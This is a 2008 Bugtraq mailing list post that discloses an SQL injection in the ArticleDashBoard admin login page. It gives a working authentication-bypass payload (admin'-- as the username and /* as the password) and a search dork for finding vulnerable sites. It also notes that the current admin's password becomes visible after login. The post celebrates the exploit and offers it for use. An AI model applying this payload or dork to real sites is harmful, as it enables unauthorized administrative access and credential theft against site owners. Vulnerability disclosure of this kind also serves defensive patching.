Bugtraq mailing list archives

Article DashBoard all version SQL Injection Vulnerability

From: xcross87 () gmail com
Date: 15 Jan 2008 13:36:22 -0000

##########################################################################
# ArticleDashBoard all version SQL Injection Vulnerability               #
# Homepage: http://articledashboard.com/                                 #
# Download: http://www.articledashboard.com/addxpc/ArticleDashboard.zip  #
# SQL Injection Found by :                                               #  
#            ^ Xcross87  | xcross87.info | hcegroup.net                  #
# Thanks to: ^ RongChauA | reaonline.net | rongchaua.net                 #
# Dork : Powered by Article DashBoard                                    #
##########################################################################


SQL Injection Vulnerability :

Link admin: http://www.victim.com/[path]/admin/login.php

user | pass = admin'-- | /*

Boomsssssss ! Top right corner.." Logged in as 'admin' "

Note:
+ This source all is encrypted !
+ If admin setup mode: 'New Admin' , move mouse to the New Admin link you can see the password of the present admin 
account that you're logging in.

[^$^] Enjoy !

=============================
# - by Xcross87 | rongchaua #
=============================

Current thread:

Article DashBoard all version SQL Injection Vulnerability xcross87 (Jan 15)
- <Possible follow-ups>
- Re: Article DashBoard all version SQL Injection Vulnerability hey (Jan 18)